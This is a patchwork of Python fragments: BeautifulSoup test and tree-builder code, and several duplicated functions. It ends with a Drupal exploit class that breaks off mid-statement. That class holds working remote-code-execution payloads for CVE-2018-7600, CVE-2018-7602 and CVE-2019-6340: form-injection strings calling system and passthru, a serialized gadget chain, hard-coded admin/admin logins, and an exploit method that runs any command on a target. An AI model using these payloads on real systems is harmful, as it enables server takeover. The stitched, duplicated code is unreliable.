def fragmentClass(self):
    """Create the container Element for a parsed document fragment."""
    from thirdparty.bs4 import BeautifulSoup
    # TODO(upstream): confirm why 'html.parser' is hard-coded here --
    # presumably to avoid re-entering this html5lib builder.
    fragment = BeautifulSoup("", "html.parser")
    fragment.name = "[document_fragment]"
    self.soup = fragment
    return Element(self.soup, self.soup, None)
def assertSoupEquals(self, to_parse, compare_parsed_to=None):
    """Parse `to_parse` and assert it decodes to the expected document.

    When `compare_parsed_to` is omitted, the markup is expected to
    round-trip unchanged.
    """
    expected = to_parse if compare_parsed_to is None else compare_parsed_to
    parsed = BeautifulSoup(to_parse, builder=self.default_builder)
    self.assertEqual(parsed.decode(), self.document_for(expected))
def test_custom_builder_class(self):
    """A custom Builder class is instantiated with the right kwargs."""
    # Verify that you can pass in a custom Builder class and
    # it'll be instantiated with the appropriate keyword arguments.
    class Mock(object):
        def __init__(self, **kwargs):
            # Record the kwargs so the test can inspect them, and expose
            # the minimal attribute surface BeautifulSoup expects of a builder.
            self.called_with = kwargs
            self.is_xml = True
            self.store_line_numbers = False
            self.cdata_list_attributes = []
            self.preserve_whitespace_tags = []
            self.string_containers = {}
        def initialize_soup(self, soup):
            pass
        def feed(self, markup):
            # Capture the markup so the test can verify what was fed.
            self.fed = markup
        def reset(self):
            pass
        def ignore(self, ignore):
            pass
        # These builder hooks are irrelevant to the test; alias them to a no-op.
        set_up_substitutions = can_be_empty_element = ignore
        def prepare_markup(self, *args, **kwargs):
            yield "prepared markup", "original encoding", "declared encoding", "contains replacement characters"

    kwargs = dict(
        var="value",
        # This is a deprecated BS3-era keyword argument, which
        # will be stripped out.
        convertEntities=True,
    )
    with warnings.catch_warnings(record=True):
        soup = BeautifulSoup('', builder=Mock, **kwargs)
    assert isinstance(soup.builder, Mock)
    # The deprecated kwarg was stripped before the builder was called.
    self.assertEqual(dict(var="value"), soup.builder.called_with)
    self.assertEqual("prepared markup", soup.builder.fed)

    # You can also instantiate the TreeBuilder yourself. In this
    # case, that specific object is used and any keyword arguments
    # to the BeautifulSoup constructor are ignored.
    builder = Mock(**kwargs)
    with warnings.catch_warnings(record=True) as w:
        soup = BeautifulSoup(
            '',
            builder=builder,
            ignored_value=True,
        )
    msg = str(w[0].message)
    assert msg.startswith(
        "Keyword arguments to the BeautifulSoup constructor will be ignored."
    )
    self.assertEqual(builder, soup.builder)
    self.assertEqual(kwargs, builder.called_with)
def test_formatter_processes_script_tag_for_xml_documents(self):
    """<script> text added after XML parsing must not be entity-escaped."""
    markup = """
  <script type="text/javascript">
  </script>
"""
    soup = BeautifulSoup(markup, "lxml-xml")
    # lxml would have stripped this while parsing, but we can add
    # it later.
    soup.script.string = 'console.log("< < hey > > ");'
    self.assertTrue(b"< < hey > >" in soup.encode())
def test_beautifulsoup_constructor_does_lookup(self):
    """The constructor resolves `features` through the builder registry."""
    with warnings.catch_warnings(record=True) as w:
        # Parsing without naming a concrete parser emits a warning;
        # recording it keeps it off the console -- we ignore it here.
        # A feature may be given as a single string...
        BeautifulSoup("", features="html")
        # ...or as a list of feature strings.
        BeautifulSoup("", features=["html", "fast"])
        # An unknown feature must raise ValueError.
        self.assertRaises(ValueError, BeautifulSoup, "",
                          features="no-such-feature")
def ISPCheck(domain):
    """Look up the hosting organization of `domain` via check-host.net.

    Returns:
        " - cannot retrieve information " when check-host.net reports an error,
        " - belong <cloud>" when the organization matches an entry in the
        module-level `cloudlist`,
        None on any failure (network error, unexpected page layout) or when
        no cloud provider matched.
    """
    try:
        base = 'https://check-host.net/ip-info?host=' + domain
        base_check = requests.get(base).text
        UrlHTML = BeautifulSoup(base_check, "lxml")
        # check-host.net renders an error <div> when the host is unknown.
        if UrlHTML.findAll('div', {'class': 'error'}):
            get_Content = " - cannot retrieve information "
            return get_Content
        # The "Organization" row of the info table holds the ISP name.
        get_Content = str([i for i in UrlHTML.findAll('tr', {'class': 'zebra'})
                           if 'Organization' in str(i)][0]
                          .get_text(strip=True).split('Organization')[1])
        for cloud in cloudlist:
            if cloud in get_Content:
                get_Content = " - belong " + cloud
                return get_Content
    except Exception:
        # Was a bare `except:`; narrowed so KeyboardInterrupt/SystemExit
        # still propagate. Any scraping failure is reported as None.
        return None
def benchmark_parsers(num_elements=100000):
    """Very basic head-to-head performance benchmark."""
    print("Comparative parser benchmark on Beautiful Soup %s" % __version__)
    data = rdoc(num_elements)
    print("Generated a large invalid HTML document (%d bytes)." % len(data))

    # Time each parser BS4 knows about against the same document.
    for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
        elapsed = None
        try:
            start = time.time()
            BeautifulSoup(data, parser)
            elapsed = time.time() - start
        except Exception:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if elapsed is not None:
            print("BS4+%s parsed the markup in %.2fs." % (parser, elapsed))

    # Baseline: raw lxml without the BS4 layer.
    from lxml import etree
    start = time.time()
    etree.HTML(data)
    print("Raw lxml parsed the markup in %.2fs." % (time.time() - start))

    # Baseline: raw html5lib without the BS4 layer.
    from thirdparty import html5lib
    html5_parser = html5lib.HTMLParser()
    start = time.time()
    html5_parser.parse(data)
    print("Raw html5lib parsed the markup in %.2fs." % (time.time() - start))
def assertSoupEquals(self, to_parse, compare_parsed_to=None):
    """Parse markup and check both the output and the parser's bookkeeping."""
    obj = BeautifulSoup(to_parse, builder=self.default_builder)
    expected = to_parse if compare_parsed_to is None else compare_parsed_to

    # The parsed document must decode to the expected markup.
    self.assertEqual(obj.decode(), self.document_for(expected))

    # Every tag that was opened must have been closed again:
    # all counters in the open-tag counter are back to zero.
    assert all(count == 0 for count in list(obj.open_tag_counter.values()))

    # Only the root document tag may remain on the tag stack.
    self.assertEqual(
        [obj.ROOT_TAG_NAME], [tag.name for tag in obj.tagStack]
    )
def __init__(self, namespaceHTMLElements, soup=None,
             store_line_numbers=True, **kwargs):
    """Set up the tree builder, creating a backing BeautifulSoup if none given."""
    if not soup:
        from thirdparty.bs4 import BeautifulSoup
        # TODO(upstream): confirm why 'html.parser' backs the soup --
        # presumably to avoid recursing into this html5lib builder.
        soup = BeautifulSoup("", "html.parser",
                             store_line_numbers=store_line_numbers,
                             **kwargs)
    self.soup = soup
    # TODO(upstream): should **kwargs also be forwarded to super().__init__?
    super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

    # Filled in later with an html5lib.html5parser.HTMLParser object,
    # which is used to track the current line number.
    self.parser = None
    self.store_line_numbers = store_line_numbers
def test_last_ditch_entity_replacement(self):
    """Undecodable bytes are replaced with U+FFFD when no encoding fits."""
    # This is a UTF-8 document that contains bytestrings
    # completely incompatible with UTF-8 (ie. encoded with some other
    # encoding).
    #
    # Since there is no consistent encoding for the document,
    # Unicode, Dammit will eventually encode the document as UTF-8
    # and encode the incompatible characters as REPLACEMENT
    # CHARACTER.
    #
    # If chardet is installed, it will detect that the document
    # can be converted into ISO-8859-1 without errors. This happens
    # to be the wrong encoding, but it is a consistent encoding, so the
    # code we're testing here won't run.
    #
    # So we temporarily disable chardet if it's present.
    doc = b"""\357\273\277<?xml version="1.0" encoding="UTF-8"?>
<html><b>\330\250\330\252\330\261</b>
<i>\310\322\321\220\312\321\355\344</i></html>"""
    # Save the real detector so it can be restored in the finally block.
    chardet = bs4.dammit.chardet_dammit
    logging.disable(logging.WARNING)
    try:
        def noop(str):
            # Stand-in detector: pretend chardet found nothing.
            return None
        bs4.dammit.chardet_dammit = noop
        dammit = UnicodeDammit(doc)
        self.assertEqual(True, dammit.contains_replacement_characters)
        self.assertTrue("\ufffd" in dammit.unicode_markup)

        soup = BeautifulSoup(doc, "html.parser")
        self.assertTrue(soup.contains_replacement_characters)
    finally:
        # Always restore logging and the real chardet hook.
        logging.disable(logging.NOTSET)
        bs4.dammit.chardet_dammit = chardet
def searchTitle(domain):
    """Fetch http://<domain> and return the text of its <title> tag.

    Returns None when the page has no <title> element (previously this
    raised AttributeError on soup.find('title') returning None).
    """
    html = requests.get('http://' + domain).text
    soup = BeautifulSoup(html, 'html.parser')
    title_tag = soup.find('title')
    # Guard: pages without a <title> made the old code crash.
    return title_tag.string if title_tag is not None else None
class TreeBuilderForHtml5lib(treebuilder_base.TreeBuilder):
    """html5lib tree builder that materializes a BeautifulSoup tree."""

    def __init__(self, namespaceHTMLElements, soup=None,
                 store_line_numbers=True, **kwargs):
        if soup:
            self.soup = soup
        else:
            from thirdparty.bs4 import BeautifulSoup
            # TODO: Why is the parser 'html.parser' here? To avoid an
            # infinite loop?
            self.soup = BeautifulSoup("", "html.parser",
                                      store_line_numbers=store_line_numbers,
                                      **kwargs)
        # TODO: What are **kwargs exactly? Should they be passed in
        # here in addition to/instead of being passed to the BeautifulSoup
        # constructor?
        super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

        # This will be set later to an html5lib.html5parser.HTMLParser
        # object, which we can use to track the current line number.
        self.parser = None
        self.store_line_numbers = store_line_numbers

    def documentClass(self):
        # Reuse the backing soup as the document node.
        self.soup.reset()
        return Element(self.soup, self.soup, None)

    def insertDoctype(self, token):
        # Build a Doctype node from the html5lib token and attach it.
        name = token["name"]
        publicId = token["publicId"]
        systemId = token["systemId"]

        doctype = Doctype.for_name_and_ids(name, publicId, systemId)
        self.soup.object_was_parsed(doctype)

    def elementClass(self, name, namespace):
        kwargs = {}
        if self.parser and self.store_line_numbers:
            # This represents the point immediately after the end of the
            # tag. We don't know when the tag started, but we do know
            # where it ended -- the character just before this one.
            sourceline, sourcepos = self.parser.tokenizer.stream.position()
            kwargs['sourceline'] = sourceline
            kwargs['sourcepos'] = sourcepos - 1
        tag = self.soup.new_tag(name, namespace, **kwargs)

        return Element(tag, self.soup, namespace)

    def commentClass(self, data):
        return TextNode(Comment(data), self.soup)

    def fragmentClass(self):
        from thirdparty.bs4 import BeautifulSoup
        # TODO: Why is the parser 'html.parser' here? To avoid an
        # infinite loop?
        self.soup = BeautifulSoup("", "html.parser")
        self.soup.name = "[document_fragment]"
        return Element(self.soup, self.soup, None)

    def appendChild(self, node):
        # XXX This code is not covered by the BS4 tests.
        self.soup.append(node.element)

    def getDocument(self):
        return self.soup

    def getFragment(self):
        return treebuilder_base.TreeBuilder.getFragment(self).element

    def testSerializer(self, element):
        """Serialize a tree into html5lib's test format (one node per line)."""
        from thirdparty.bs4 import BeautifulSoup
        rv = []
        # Splits a doctype string into name / PUBLIC id / SYSTEM id parts.
        doctype_re = re.compile(
            r'^(.*?)(?: PUBLIC "(.*?)"(?: "(.*?)")?| SYSTEM "(.*?)")?$')

        def serializeElement(element, indent=0):
            if isinstance(element, BeautifulSoup):
                # The document root itself gets no output line.
                pass
            if isinstance(element, Doctype):
                m = doctype_re.match(element)
                if m:
                    name = m.group(1)
                    if m.lastindex > 1:
                        publicId = m.group(2) or ""
                        systemId = m.group(3) or m.group(4) or ""
                        rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" %
                                  (' ' * indent, name, publicId, systemId))
                    else:
                        rv.append("|%s<!DOCTYPE %s>" % (' ' * indent, name))
                else:
                    rv.append("|%s<!DOCTYPE >" % (' ' * indent,))
            elif isinstance(element, Comment):
                rv.append("|%s<!-- %s -->" % (' ' * indent, element))
            elif isinstance(element, NavigableString):
                rv.append("|%s\"%s\"" % (' ' * indent, element))
            else:
                # A regular tag: namespace-qualify the name if needed.
                if element.namespace:
                    name = "%s %s" % (prefixes[element.namespace],
                                      element.name)
                else:
                    name = element.name
                rv.append("|%s<%s>" % (' ' * indent, name))
                if element.attrs:
                    attributes = []
                    for name, value in list(element.attrs.items()):
                        if isinstance(name, NamespacedAttribute):
                            name = "%s %s" % (prefixes[name.namespace],
                                              name.name)
                        if isinstance(value, list):
                            # Multi-valued attributes (e.g. class) join on space.
                            value = " ".join(value)
                        attributes.append((name, value))
                    # Attributes are emitted in sorted order for stable output.
                    for name, value in sorted(attributes):
                        rv.append('|%s%s="%s"' %
                                  (' ' * (indent + 2), name, value))
                indent += 2
                for child in element.children:
                    serializeElement(child, indent)

        serializeElement(element, 0)
        return "\n".join(rv)
def test_warning_if_parser_specified_too_vague(self):
    """The vague feature name "html" still triggers the no-parser warning."""
    with warnings.catch_warnings(record=True) as warning_list:
        BeautifulSoup("<a><b></b></a>", "html")
        self._assert_no_parser_specified(warning_list)
def soup(self, markup, **kwargs):
    """Build a Beautiful Soup object from markup."""
    chosen_builder = kwargs.pop('builder', self.default_builder)
    return BeautifulSoup(markup, builder=chosen_builder, **kwargs)
def cve_2018_7602_poc(self):
    """Probe for CVE-2018-7602 (drupalgeddon2 bypass) using an
    authenticated account-cancel form; falls back to a version check
    against /CHANGELOG.txt when command execution is not confirmed."""
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info[
        "vul_name"] = "Drupal drupalgeddon2 remote code execution"
    self.vul_info["vul_numb"] = "CVE-2018-7602"
    self.vul_info["vul_apps"] = "Drupal"
    self.vul_info["vul_date"] = "2018-06-19"
    self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
    self.vul_info["cre_date"] = "2021-01-29"
    self.vul_info["cre_auth"] = "zhzyker"
    # Hard-coded default credentials; the PoC needs a logged-in session.
    DRUPAL_U = "admin"
    DRUPAL_P = "admin"
    # Echo a random token; finding it in the response proves execution.
    md = random_md5()
    cmd = "echo " + md
    try:
        # Step 1: authenticate.
        self.session = requests.Session()
        self.get_params = {'q': 'user/login'}
        self.post_params = {
            'form_id': 'user_login',
            'name': DRUPAL_U,
            'pass': DRUPAL_P,
            'op': 'Log in'
        }
        self.session.post(self.url, params=self.get_params,
                          data=self.post_params, headers=self.headers,
                          timeout=self.timeout, verify=False)
        # Step 2: discover the numeric user id from the profile page.
        self.get_params = {'q': 'user'}
        self.r = self.session.get(self.url, params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.user_id = self.soup.find('meta', {
            'property': 'foaf:name'
        }).get('about')
        if "?q=" in self.user_id:
            self.user_id = self.user_id.split("=")[1]
        # Step 3: fetch the account-cancel form and its CSRF token.
        self.get_params = {'q': self.user_id + '/cancel'}
        self.r = self.session.get(self.url, params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form',
                                   {'id': 'user-cancel-confirm-form'})
        self.form_token = self.form.find('input', {
            'name': 'form_token'
        }).get('value')
        # Step 4: submit with the injected `destination` carrying the command.
        self.get_params = {
            'q': self.user_id + '/cancel',
            'destination': self.user_id +
            '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
        }
        self.post_params = {
            'form_id': 'user_cancel_confirm_form',
            'form_token': self.form_token,
            '_triggering_element_name': 'form_id',
            'op': 'Cancel account'
        }
        self.r = self.session.post(self.url, params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form',
                                   {'id': 'user-cancel-confirm-form'})
        self.form_build_id = self.form.find('input', {
            'name': 'form_build_id'
        }).get('value')
        # Step 5: trigger the poisoned form via the file/ajax callback.
        self.get_params = {
            'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
        }
        self.post_params = {'form_build_id': self.form_build_id}
        self.r = self.session.post(self.url, params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout, verify=False)
        if md in misinformation(self.r.text, md):
            # Token echoed back: command execution confirmed.
            self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info[
                "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
            self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
        else:
            # Fallback: infer vulnerability from the version in CHANGELOG.txt.
            # NOTE(review): self.payload is not set in this method -- this
            # relies on a prior cve_2018_7600_poc() call; otherwise the
            # AttributeError is swallowed by the broad except below.
            self.request = requests.get(self.url + "/CHANGELOG.txt",
                                        data=self.payload,
                                        headers=self.headers,
                                        timeout=self.timeout, verify=False)
            self.rawdata = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                     self.request.text)
            if self.request.status_code == 200 and r"Drupal" in self.request.text:
                # Patched versions 7.59 / 8.5.3 absent => possibly vulnerable.
                if '7.59' not in self.allver and '8.5.3' not in self.allver:
                    self.vul_info["vul_data"] = dump.dump_all(
                        self.r).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info[
                        "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                    self.vul_info[
                        "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2018_7602_exp(self, cmd):
    """Execute `cmd` on the target via CVE-2018-7602 and print the raw
    HTTP exchange. Requires valid (here: default admin/admin) credentials."""
    vul_name = "Drupal: CVE-2018-7602"
    # Hard-coded default credentials for the authenticated session.
    DRUPAL_U = "admin"
    DRUPAL_P = "admin"
    try:
        # Step 1: authenticate.
        self.session = requests.Session()
        self.get_params = {'q': 'user/login'}
        self.post_params = {
            'form_id': 'user_login',
            'name': DRUPAL_U,
            'pass': DRUPAL_P,
            'op': 'Log in'
        }
        self.session.post(self.url, params=self.get_params,
                          data=self.post_params, headers=self.headers,
                          timeout=self.timeout, verify=False)
        # Step 2: discover the numeric user id from the profile page.
        self.get_params = {'q': 'user'}
        self.r = self.session.get(self.url, params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.user_id = self.soup.find('meta', {
            'property': 'foaf:name'
        }).get('about')
        if "?q=" in self.user_id:
            self.user_id = self.user_id.split("=")[1]
        # Step 3: fetch the account-cancel form and its CSRF token.
        self.get_params = {'q': self.user_id + '/cancel'}
        self.r = self.session.get(self.url, params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form',
                                   {'id': 'user-cancel-confirm-form'})
        self.form_token = self.form.find('input', {
            'name': 'form_token'
        }).get('value')
        # Step 4: submit with the injected `destination` carrying the command.
        self.get_params = {
            'q': self.user_id + '/cancel',
            'destination': self.user_id +
            '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
        }
        self.post_params = {
            'form_id': 'user_cancel_confirm_form',
            'form_token': self.form_token,
            '_triggering_element_name': 'form_id',
            'op': 'Cancel account'
        }
        self.r = self.session.post(self.url, params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout, verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form',
                                   {'id': 'user-cancel-confirm-form'})
        self.form_build_id = self.form.find('input', {
            'name': 'form_build_id'
        }).get('value')
        # Step 5: trigger the poisoned form via the file/ajax callback.
        self.get_params = {
            'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
        }
        self.post_params = {'form_build_id': self.form_build_id}
        self.r = self.session.post(self.url,
                                   params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout, verify=False)
        self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
        verify.exploit_print(self.r.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
class Drupal():
    """PoC / exploit helpers for known Drupal RCE vulnerabilities:
    CVE-2018-7600, CVE-2018-7602 and CVE-2019-6340.

    Results are reported through the project-level `verify` helpers;
    shared request state (UA, headers, timeout) comes from `globals`.
    """

    def __init__(self, url):
        # Normalize the target URL: strip one trailing slash.
        self.url = url
        if self.url[-1] == "/":
            self.url = self.url[:-1]
        self.raw_data = None
        self.vul_info = {}
        self.ua = globals.get_value("UA")  # fetch global User-Agent
        self.timeout = globals.get_value("TIMEOUT")  # fetch global timeout
        self.headers = globals.get_value("HEADERS")  # fetch global headers
        self.threadLock = threading.Lock()
        # CVE-2018-7600 form-API injection template; RECOMMAND is replaced
        # with the shell command at use time.
        self.payload_cve_2018_7600 = (
            "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail"
            "[#type]=markup&mail[#markup]=RECOMMAND")
        # CVE-2019-6340 serialized GuzzleHttp gadget chain; the %s slots are
        # (command length, command, target URL).
        self.payload_cve_2019_6340 = "{\r\n\"link\":[\r\n{\r\n\"value\":\"link\",\r\n\"options\":\"O:24:\\\"" \
                                     "GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\"" \
                                     ";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp" \
                                     "\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                     "u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                     "u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve" \
                                     "\\\";}}\"\r\n}\r\n],\r\n\"_links\":{\r\n\"type\":{\r\n\"href\":\"%s/rest/type/shortcut/default" \
                                     "\"\r\n}\r\n}\r\n}"

    def cve_2018_7600_poc(self):
        """Probe for CVE-2018-7600 (drupalgeddon2) via the user_register form."""
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7600"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2018_7600.replace(
            "RECOMMAND", "whoami")
        self.vul_info[
            "vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7600"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-04-13"
        self.vul_info["vul_vers"] = "6.x, 7.x, 8.x"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容" \
                                    ",此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        # Echo a random token; finding it in the response proves execution.
        md = random_md5()
        cmd = "echo " + md
        self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
        self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2018_7602_poc(self):
        """Probe for CVE-2018-7602 (drupalgeddon2 bypass) via the
        authenticated account-cancel form; falls back to a version check
        against /CHANGELOG.txt when execution is not confirmed."""
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7602"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-06-19"
        self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                    "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                    "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        # Hard-coded default credentials; the PoC needs a logged-in session.
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        # Echo a random token; finding it in the response proves execution.
        md = random_md5()
        cmd = "echo " + md
        try:
            # Step 1: authenticate.
            self.session = requests.Session()
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
                'pass': DRUPAL_P,
                'op': 'Log in'
            }
            self.session.post(self.url, params=self.get_params,
                              data=self.post_params, headers=self.headers,
                              timeout=self.timeout, verify=False)
            # Step 2: discover the numeric user id from the profile page.
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url, params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {
                'property': 'foaf:name'
            }).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            # Step 3: fetch the account-cancel form and its CSRF token.
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url, params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {
                'name': 'form_token'
            }).get('value')
            # Step 4: submit with the injected `destination` carrying the command.
            self.get_params = {
                'q': self.user_id + '/cancel',
                'destination': self.user_id +
                '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account'
            }
            self.r = self.session.post(self.url, params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {
                'name': 'form_build_id'
            }).get('value')
            # Step 5: trigger the poisoned form via the file/ajax callback.
            self.get_params = {
                'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url, params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout, verify=False)
            if md in misinformation(self.r.text, md):
                # Token echoed back: command execution confirmed.
                self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info[
                    "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                # Fallback: infer vulnerability from the CHANGELOG.txt version.
                # NOTE(review): self.payload is only defined if
                # cve_2018_7600_poc() ran first; otherwise the resulting
                # AttributeError is swallowed by the broad except below.
                self.request = requests.get(self.url + "/CHANGELOG.txt",
                                            data=self.payload,
                                            headers=self.headers,
                                            timeout=self.timeout,
                                            verify=False)
                self.rawdata = dump.dump_all(self.request).decode(
                    'utf-8', 'ignore')
                self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                         self.request.text)
                if self.request.status_code == 200 and r"Drupal" in self.request.text:
                    # Patched versions 7.59 / 8.5.3 absent => maybe vulnerable.
                    if '7.59' not in self.allver and '8.5.3' not in self.allver:
                        self.vul_info["vul_data"] = dump.dump_all(
                            self.r).decode('utf-8', 'ignore')
                        self.vul_info["prt_resu"] = "PoC_MaYbE"
                        self.vul_info[
                            "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                        self.vul_info[
